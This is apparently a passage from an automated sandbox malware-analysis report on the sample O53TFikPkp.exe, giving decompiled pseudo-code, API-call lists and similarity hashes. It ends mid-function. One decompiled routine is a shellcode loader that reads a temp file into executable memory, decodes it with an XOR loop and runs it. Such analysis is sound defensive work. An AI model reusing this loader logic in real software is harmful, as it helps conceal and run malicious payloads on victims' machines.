                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp
                                                                                            • API String ID: 3751793516-47812868
                                                                                            • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                                                                                            • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                                                                                            • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                                                                                            • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                                                                                            C-Code - Quality: 100%
                                                                                            			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                            				signed int _t11;
                                                                                            				int _t14;
                                                                                            				signed int _t16;
                                                                                            				void* _t19;
                                                                                            				CHAR* _t20;
                                                                                            
                                                                                            				_t20 = _a4;
                                                                                            				_t19 = 0x64;
                                                                                            				while(1) {
                                                                                            					_t19 = _t19 - 1;
                                                                                            					_a4 = 0x61736e;
                                                                                            					_t11 = GetTickCount();
                                                                                            					_t16 = 0x1a;
                                                                                            					_a6 = _a6 + _t11 % _t16;
                                                                                            					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                            					if(_t14 != 0) {
                                                                                            						break;
                                                                                            					}
                                                                                            					if(_t19 != 0) {
                                                                                            						continue;
                                                                                            					}
                                                                                            					 *_t20 =  *_t20 & 0x00000000;
                                                                                            					return _t14;
                                                                                            				}
                                                                                            				return _t20;
                                                                                            			}








                                                                                            0x0040578f
                                                                                            0x00405795
                                                                                            0x00405796
                                                                                            0x00405796
                                                                                            0x00405797
                                                                                            0x0040579e
                                                                                            0x004057a8
                                                                                            0x004057b5
                                                                                            0x004057b8
                                                                                            0x004057c0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004057c4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004057c6
                                                                                            0x00000000
                                                                                            0x004057c6
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0040579E
                                                                                            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: CountFileNameTempTick
                                                                                            • String ID: "C:\Users\user\Desktop\O53TFikPkp.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                            • API String ID: 1716503409-473978402
                                                                                            • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                            • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                                                                                            • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                            • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 76%
                                                                                            			E72B210A0(void* __ecx, void* __eflags) {
                                                                                            				short _v8;
                                                                                            				short _v10;
                                                                                            				short _v12;
                                                                                            				short _v14;
                                                                                            				short _v16;
                                                                                            				short _v18;
                                                                                            				short _v20;
                                                                                            				short _v22;
                                                                                            				short _v24;
                                                                                            				short _v26;
                                                                                            				char _v28;
                                                                                            				void* _v32;
                                                                                            				long _v36;
                                                                                            				long _v40;
                                                                                            				short _v1080;
                                                                                            				void _v6384;
                                                                                            				void* _t38;
                                                                                            				intOrPtr _t41;
                                                                                            				struct _OVERLAPPED* _t63;
                                                                                            				void* _t72;
                                                                                            
                                                                                            				E72B21000(0x18ec, __ecx);
                                                                                            				_v28 = 0x6f;
                                                                                            				_v26 = 0x6b;
                                                                                            				_v24 = 0x6a;
                                                                                            				_v22 = 0x64;
                                                                                            				_v20 = 0x6c;
                                                                                            				_v18 = 0x70;
                                                                                            				_v16 = 0x6b;
                                                                                            				_v14 = 0x6c;
                                                                                            				_v12 = 0x63;
                                                                                            				_v10 = 0x78;
                                                                                            				_v8 = 0;
                                                                                            				GetTempPathW(0x103,  &_v1080);
                                                                                            				E72B21030( &_v1080,  &_v28);
                                                                                            				VirtualProtect( &_v6384, 0x14b8, 0x40,  &_v36); // executed
                                                                                            				_t38 = CreateFileW( &_v1080, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                                                                            				_v32 = _t38;
                                                                                            				ReadFile(_v32,  &_v6384, 0x14b8,  &_v40, 0); // executed
                                                                                            				_t63 = 0;
                                                                                            				while(1) {
                                                                                            					_t41 =  *((intOrPtr*)(_t72 + _t63 - 0x18ec));
                                                                                            					if(_t63 == 0x14b8) {
                                                                                            						break;
                                                                                            					}
                                                                                            					 *((char*)(_t72 + _t63 - 0x18ec)) = ((_t41 + 0x00000001 ^ 0x21) + 0x128 ^ 0x9c) + 0x34 - 1;
                                                                                            					_t63 =  &(_t63->Internal);
                                                                                            				}
                                                                                            				_v6384();
                                                                                            				return 0;
                                                                                            			}























                                                                                            0x72b210a8
                                                                                            0x72b210b2
                                                                                            0x72b210bb
                                                                                            0x72b210c4
                                                                                            0x72b210cd
                                                                                            0x72b210d6
                                                                                            0x72b210df
                                                                                            0x72b210e8
                                                                                            0x72b210f1
                                                                                            0x72b210fa
                                                                                            0x72b21103
                                                                                            0x72b21109
                                                                                            0x72b21119
                                                                                            0x72b2112a
                                                                                            0x72b21144
                                                                                            0x72b21163
                                                                                            0x72b21169
                                                                                            0x72b21182
                                                                                            0x72b21188
                                                                                            0x72b2118d
                                                                                            0x72b2118d
                                                                                            0x72b2119a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x72b211b0
                                                                                            0x72b211b7
                                                                                            0x72b211b7
                                                                                            0x72b211c9
                                                                                            0x72b211d0

                                                                                            APIs
                                                                                            • GetTempPathW.KERNEL32(00000103,?), ref: 72B21119
                                                                                            • VirtualProtect.KERNELBASE(?,000014B8,00000040,?), ref: 72B21144
                                                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72B21163
                                                                                            • ReadFile.KERNELBASE(?,?,000014B8,?,00000000), ref: 72B21182
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.667597675.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
                                                                                            • Associated: 00000001.00000002.667585478.0000000072B20000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.667637988.0000000072B22000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_72b20000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CreatePathProtectReadTempVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 205760209-0
                                                                                            • Opcode ID: 8cd0dffa06b2d0f7e0dfdd0852742e755bd5f4ef96cfd7c2833ab4262b4c595b
                                                                                            • Instruction ID: a61a6811757ec56ff77e1aa73d3b5c85eec2a44f8881ed1e1323f5f7225e4387
                                                                                            • Opcode Fuzzy Hash: 8cd0dffa06b2d0f7e0dfdd0852742e755bd5f4ef96cfd7c2833ab4262b4c595b
                                                                                            • Instruction Fuzzy Hash: FC31A471910308ABFB14DBE0C851BEE73B9EF54700F109468E209EB281E77A5B05CB65
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            C-Code - Quality: 84%
                                                                                            			E004031F1(void* __eflags) {
                                                                                            				void* _t2;
                                                                                            				void* _t5;
                                                                                            				CHAR* _t6;
                                                                                            
                                                                                            				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                            				E00405CE3(_t6);
                                                                                            				_t2 = E004055E5(_t6);
                                                                                            				if(_t2 != 0) {
                                                                                            					E00405578(_t6);
                                                                                            					CreateDirectoryA(_t6, 0); // executed
                                                                                            					_t5 = E0040578B("1033", _t6); // executed
                                                                                            					return _t5;
                                                                                            				} else {
                                                                                            					return _t2;
                                                                                            				}
                                                                                            			}






                                                                                            0x004031f2
                                                                                            0x004031f8
                                                                                            0x004031fe
                                                                                            0x00403205
                                                                                            0x0040320a
                                                                                            0x00403212
                                                                                            0x0040321e
                                                                                            0x00403224
                                                                                            0x00403208
                                                                                            0x00403208
                                                                                            0x00403208

                                                                                            APIs
                                                                                              • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                                                                                              • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                                                                                              • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                                                                                              • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\O53TFikPkp.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                                                                                            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.666527625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.666515944.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666540617.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666584246.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666656569.0000000000422000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666666204.0000000000429000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000001.00000002.666680734.000000000042C000.00000002.00020000.sdmp Download File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_O53TFikPkp.jbxd
                                                                                            Similarity
                                                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                            • API String ID: 4115351271-517883005
                                                                                            • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                                                                                            • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                                                                                            • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                                                                                            • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 618 406481-406487 619 406489-40648b 618->619 620 40648c-4064aa 618->620 619->620 621 4066b8-4066cd 620->621 622 40677d-40678a 620->622 623 4066e7-4066fd 621->623 624 4066cf-4066e5 621->624 625 4067b4-4067b8 622->625 628 406700-406707 623->628 624->628 626 406818-40682b 625->626 627 4067ba-4067db 625->627 631 406734-40673a 626->631 629 4067f4-406807 627->629 630 4067dd-4067f2 627->630 632 406709-40670d 628->632 633 40672e 628->633 635 40680a-406811 629->635 630->635 641 4068e7 631->641 642 405edf 631->642 636 406713-40672b 632->636 637 4068bc-4068c6 632->637 633->631 638 4067b1 635->638 639 406813 635->639 636->633 640 4068d2-4068e5 637->640 638->625 652 406796-4067ae 639->652 653 4068c8 639->653 643 4068ea-4068ee 640->643 641->643 645 405ee6-405eea 642->645 646 406026-406047 642->646 647 405f8b-405f8f 642->647 648 405ffb-405fff 642->648 645->640 651 405ef0-405efd 645->651 646->621 649 405f95-405fae 647->649 650 40683b-406845 647->650 654 406005-406019 648->654 655 40684a-406854 648->655 657 405fb1-405fb5 649->657 650->640 651->641 658 405f03-405f49 651->658 652->638 653->640 656 40601c-406024 654->656 655->640 656->646 656->648 657->647 659 405fb7-405fbd 657->659 660 405f71-405f73 658->660 661 405f4b-405f4f 658->661 666 405fe7-405ff9 659->666 667 405fbf-405fc6 659->667 664 405f81-405f89 660->664 665 405f75-405f7f 660->665 662 405f51-405f54 GlobalFree 661->662 663 405f5a-405f68 GlobalAlloc 661->663 662->663 663->641 668 405f6e 663->668 664->657 665->664 665->665 666->656 669 405fd1-405fe1 GlobalAlloc 667->669 670 405fc8-405fcb GlobalFree 667->670 668->660 669->641 669->666 670->669
                                                                                            C-Code - Quality: 99%
                                                                                            			E00406481() {
                                                                                            				signed int _t530;
                                                                                            				void _t537;
                                                                                            				signed int _t538;
                                                                                            				signed int _t539;
                                                                                            				unsigned short _t569;
                                                                                            				signed int _t579;
                                                                                            				signed int _t607;
                                                                                            				void* _t627;
                                                                                            				signed int _t628;
                                                                                            				signed int _t635;
                                                                                            				signed int* _t643;
                                                                                            				void* _t644;
                                                                                            
                                                                                            				L0:
                                                                                            				while(1) {
                                                                                            					L0:
                                                                                            					_t530 =  *(_t644 - 0x30);
                                                                                            					if(_t530 >= 4) {
                                                                                            					}
                                                                                            					 *(_t644 - 0x40) = 6;
                                                                                            					 *(_t644 - 0x7c) = 0x19;
                                                                                            					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
                                                                                            					while(1) {
                                                                                            						L145:
                                                                                            						 *(_t644 - 0x50) = 1;
                                                                                            						 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                                                                            						while(1) {
                                                                                            							L149:
                                                                                            							if( *(_t644 - 0x48) <= 0) {
                                                                                            								goto L155;
                                                                                            							}
                                                                                            							L150:
                                                                                            							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
                                                                                            							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
                                                                                            							 *(_t644 - 0x54) = _t643;
                                                                                            							_t569 =  *_t643;
                                                                                            							_t635 = _t569 & 0x0000ffff;
                                                                                            							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
                                                                                            							if( *(_t644 - 0xc) >= _t607) {
                                                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
                                                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
                                                                                            								_t628 = _t627 + 1;
                                                                                            								 *_t643 = _t569 - (_t569 >> 5);
                                                                                            								 *(_t644 - 0x50) = _t628;
                                                                                            							} else {
                                                                                            								 *(_t644 - 0x10) = _t607;
                                                                                            								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
                                                                                            								 *_t643 = (0x800 - _t635 >> 5) + _t569;
                                                                                            							}
                                                                                            							if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                            								L148:
                                                                                            								_t487 = _t644 - 0x48;
                                                                                            								 *_t487 =  *(_t644 - 0x48) - 1;
                                                                                            								L149:
                                                                                            								if( *(_t644 - 0x48) <= 0) {
                                                                                            									goto L155;
                                                                                            								}
                                                                                            								goto L150;
                                                                                            							} else {
                                                                                            								L154:
                                                                                            								L146:
                                                                                            								if( *(_t644 - 0x6c) == 0) {
                                                                                            									L169:
                                                                                            									 *(_t644 - 0x88) = 0x18;
                                                                                            									L170:
                                                                                            									_t579 = 0x22;
                                                                                            									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
                                                                                            									_t539 = 0;
                                                                                            									L172:
                                                                                            									return _t539;
                                                                                            								}
                                                                                            								L147:
                                                                                            								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                            								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                            								_t484 = _t644 - 0x70;
                                                                                            								 *_t484 =  &(( *(_t644 - 0x70))[1]);
                                                                                            								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                            								goto L148;
                                                                                            							}
                                                                                            							L155:
                                                                                            							_t537 =  *(_t644 - 0x7c);
                                                                                            							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
                                                                                            							while(1) {
                                                                                            								L140:
                                                                                            								 *(_t644 - 0x88) = _t537;
                                                                                            								while(1) {
                                                                                            									L1:
                                                                                            									_t538 =  *(_t644 - 0x88);
                                                                                            									if(_t538 > 0x1c) {
                                                                                            										break;
                                                                                            									}
                                                                                            									L2:
                                                                                            									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
                                                                                            										case 0:
                                                                                            											L3:
                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L4:
                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                            											_t538 =  *( *(_t644 - 0x70));
                                                                                            											if(_t538 > 0xe1) {
                                                                                            												goto L171;
                                                                                            											}
                                                                                            											L5:
                                                                                            											_t542 = _t538 & 0x000000ff;
                                                                                            											_push(0x2d);
                                                                                            											asm("cdq");
                                                                                            											_pop(_t581);
                                                                                            											_push(9);
                                                                                            											_pop(_t582);
                                                                                            											_t638 = _t542 / _t581;
                                                                                            											_t544 = _t542 % _t581 & 0x000000ff;
                                                                                            											asm("cdq");
                                                                                            											_t633 = _t544 % _t582 & 0x000000ff;
                                                                                            											 *(_t644 - 0x3c) = _t633;
                                                                                            											 *(_t644 - 0x1c) = (1 << _t638) - 1;
                                                                                            											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
                                                                                            											_t641 = (0x300 << _t633 + _t638) + 0x736;
                                                                                            											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
                                                                                            												L10:
                                                                                            												if(_t641 == 0) {
                                                                                            													L12:
                                                                                            													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
                                                                                            													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                            													goto L15;
                                                                                            												} else {
                                                                                            													goto L11;
                                                                                            												}
                                                                                            												do {
                                                                                            													L11:
                                                                                            													_t641 = _t641 - 1;
                                                                                            													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
                                                                                            												} while (_t641 != 0);
                                                                                            												goto L12;
                                                                                            											}
                                                                                            											L6:
                                                                                            											if( *(_t644 - 4) != 0) {
                                                                                            												GlobalFree( *(_t644 - 4));
                                                                                            											}
                                                                                            											_t538 = GlobalAlloc(0x40, 0x600); // executed
                                                                                            											 *(_t644 - 4) = _t538;
                                                                                            											if(_t538 == 0) {
                                                                                            												goto L171;
                                                                                            											} else {
                                                                                            												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
                                                                                            												goto L10;
                                                                                            											}
                                                                                            										case 1:
                                                                                            											L13:
                                                                                            											__eflags =  *(_t644 - 0x6c);
                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                            												L157:
                                                                                            												 *(_t644 - 0x88) = 1;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L14:
                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                            											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                            											_t45 = _t644 - 0x48;
                                                                                            											 *_t45 =  *(_t644 - 0x48) + 1;
                                                                                            											__eflags =  *_t45;
                                                                                            											L15:
                                                                                            											if( *(_t644 - 0x48) < 4) {
                                                                                            												goto L13;
                                                                                            											}
                                                                                            											L16:
                                                                                            											_t550 =  *(_t644 - 0x40);
                                                                                            											if(_t550 ==  *(_t644 - 0x74)) {
                                                                                            												L20:
                                                                                            												 *(_t644 - 0x48) = 5;
                                                                                            												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
                                                                                            												goto L23;
                                                                                            											}
                                                                                            											L17:
                                                                                            											 *(_t644 - 0x74) = _t550;
                                                                                            											if( *(_t644 - 8) != 0) {
                                                                                            												GlobalFree( *(_t644 - 8));
                                                                                            											}
                                                                                            											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
                                                                                            											 *(_t644 - 8) = _t538;
                                                                                            											if(_t538 == 0) {
                                                                                            												goto L171;
                                                                                            											} else {
                                                                                            												goto L20;
                                                                                            											}
                                                                                            										case 2:
                                                                                            											L24:
                                                                                            											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
                                                                                            											 *(_t644 - 0x84) = 6;
                                                                                            											 *(_t644 - 0x4c) = _t557;
                                                                                            											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
                                                                                            											goto L132;
                                                                                            										case 3:
                                                                                            											L21:
                                                                                            											__eflags =  *(_t644 - 0x6c);
                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                            												L158:
                                                                                            												 *(_t644 - 0x88) = 3;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L22:
                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                            											_t67 = _t644 - 0x70;
                                                                                            											 *_t67 =  &(( *(_t644 - 0x70))[1]);
                                                                                            											__eflags =  *_t67;
                                                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                            											L23:
                                                                                            											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
                                                                                            											if( *(_t644 - 0x48) != 0) {
                                                                                            												goto L21;
                                                                                            											}
                                                                                            											goto L24;
                                                                                            										case 4:
                                                                                            											L133:
                                                                                            											_t559 =  *_t642;
                                                                                            											_t626 = _t559 & 0x0000ffff;
                                                                                            											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
                                                                                            											if( *(_t644 - 0xc) >= _t596) {
                                                                                            												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
                                                                                            												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
                                                                                            												 *(_t644 - 0x40) = 1;
                                                                                            												_t560 = _t559 - (_t559 >> 5);
                                                                                            												__eflags = _t560;
                                                                                            												 *_t642 = _t560;
                                                                                            											} else {
                                                                                            												 *(_t644 - 0x10) = _t596;
                                                                                            												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
                                                                                            												 *_t642 = (0x800 - _t626 >> 5) + _t559;
                                                                                            											}
                                                                                            											if( *(_t644 - 0x10) >= 0x1000000) {
                                                                                            												goto L139;
                                                                                            											} else {
                                                                                            												goto L137;
                                                                                            											}
                                                                                            										case 5:
                                                                                            											L137:
                                                                                            											if( *(_t644 - 0x6c) == 0) {
                                                                                            												L168:
                                                                                            												 *(_t644 - 0x88) = 5;
                                                                                            												goto L170;
                                                                                            											}
                                                                                            											L138:
                                                                                            											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
                                                                                            											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
                                                                                            											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
                                                                                            											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
                                                                                            											L139:
                                                                                            											_t537 =  *(_t644 - 0x84);
                                                                                            											L140:
                                                                                            											 *(_t644 - 0x88) = _t537;
                                                                                            											goto L1;
                                                                                            										case 6:
                                                                                            											L25:
                                                                                            											__edx = 0;
                                                                                            											__eflags =  *(__ebp - 0x40);
                                                                                            											if( *(__ebp - 0x40) != 0) {
                                                                                            												L36:
                                                                                            												__eax =  *(__ebp - 4);
                                                                                            												__ecx =  *(__ebp - 0x38);
                                                                                            												 *(__ebp - 0x34) = 1;
                                                                                            												 *(__ebp - 0x84) = 7;
                                                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                            												goto L132;
                                                                                            											}
                                                                                            											L26:
                                                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                            											__esi =  *(__ebp - 0x60);
                                                                                            											__cl = 8;
                                                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                            											__ecx =  *(__ebp - 0x3c);
                                                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                            											__ecx =  *(__ebp - 4);
                                                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                            											if( *(__ebp - 0x38) >= 4) {
                                                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                                                            													_t98 = __ebp - 0x38;
                                                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                            													__eflags =  *_t98;
                                                                                            												} else {
                                                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                            												}
                                                                                            											} else {
                                                                                            												 *(__ebp - 0x38) = 0;
                                                                                            											}
                                                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                                                            											if( *(__ebp - 0x34) == __edx) {
                                                                                            												L35:
                                                                                            												__ebx = 0;
                                                                                            												__ebx = 1;
                                                                                            												goto L61;
                                                                                            											} else {
                                                                                            												L32:
                                                                                            												__eax =  *(__ebp - 0x14);
                                                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                                                            													__eflags = __eax;
                                                                                            												}
